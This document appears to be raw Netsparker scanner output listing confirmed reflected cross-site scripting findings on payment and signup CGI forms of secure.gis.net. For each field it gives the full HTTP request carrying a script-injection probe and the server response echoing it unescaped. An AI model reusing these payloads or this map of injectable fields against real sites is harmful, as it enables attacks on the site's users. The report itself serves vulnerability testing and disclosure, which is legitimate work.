FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x00109E)%3c%2fscript%3e&CCNUM=3&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&tosagree=agree&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&ACCOUNTTYPE=Region+1+Business+Unlimited&monthlytotal4=39.95&monthlytotal=39.95&Activation_Fee=Activation_Fee&onetimetotal0=0&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal2=0&pcphone=0.00&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:19:52 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x00109E)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
CARDTYPE POST MC
CCNUM POST '"--><script>alert(0x00109F)</script>
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
tosagree POST agree
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
ACCOUNTTYPE POST Region 1 Business Unlimited
monthlytotal4 POST 39.95
monthlytotal POST 39.95
Activation_Fee POST Activation_Fee
onetimetotal0 POST 0
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal2 POST 0
pcphone POST 0.00
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 701
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&CARDTYPE=MC&CCNUM='%22--%3e%3cscript%3enetsparker(0x00109F)%3c%2fscript%3e&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&tosagree=agree&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&ACCOUNTTYPE=Region+1+Business+Unlimited&monthlytotal4=39.95&monthlytotal=39.95&Activation_Fee=Activation_Fee&onetimetotal0=0&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal2=0&pcphone=0.00&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:19:54 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: MC <P>'"><script>netsparker(0x00109F)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST '"--><script>alert(0x001690)</script>
EMAIL POST netsparker@example.com
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 139
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME='%22--%3e%3cscript%3enetsparker(0x001690)%3c%2fscript%3e&EMAIL=netsparker%40example.com&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:10 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x001690)</script>"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 
CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST '"--><script>alert(0x001693)</script>
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 127
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL='%22--%3e%3cscript%3enetsparker(0x001693)%3c%2fscript%3e&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:13 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x001693)</script>"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> 
<FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST netsparker@example.com
STREET POST '"--><script>alert(0x001696)</script>
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 150
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL=netsparker%40example.com&STREET='%22--%3e%3cscript%3enetsparker(0x001696)%3c%2fscript%3e&CITY=3&STATE=3&ZIP=3&PHONE=3&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:15 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x001696)</script>"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 
CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST netsparker@example.com
STREET POST 3
CITY POST '"--><script>alert(0x001699)</script>
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 150
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL=netsparker%40example.com&STREET=3&CITY='%22--%3e%3cscript%3enetsparker(0x001699)%3c%2fscript%3e&STATE=3&ZIP=3&PHONE=3&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:18 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x001699)</script>"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 
CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST netsparker@example.com
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST '"--><script>alert(0x0016C0)</script>
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 150
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL=netsparker%40example.com&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE='%22--%3e%3cscript%3enetsparker(0x0016C0)%3c%2fscript%3e&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:40 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x0016C0)</script>"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 
CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST netsparker@example.com
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST '"--><script>alert(0x0016C3)</script>

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 150
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL=netsparker%40example.com&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&DOMAIN='%22--%3e%3cscript%3enetsparker(0x0016C3)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:44 GMT
Server: Apache
Connection: close
Content-Type: text/html


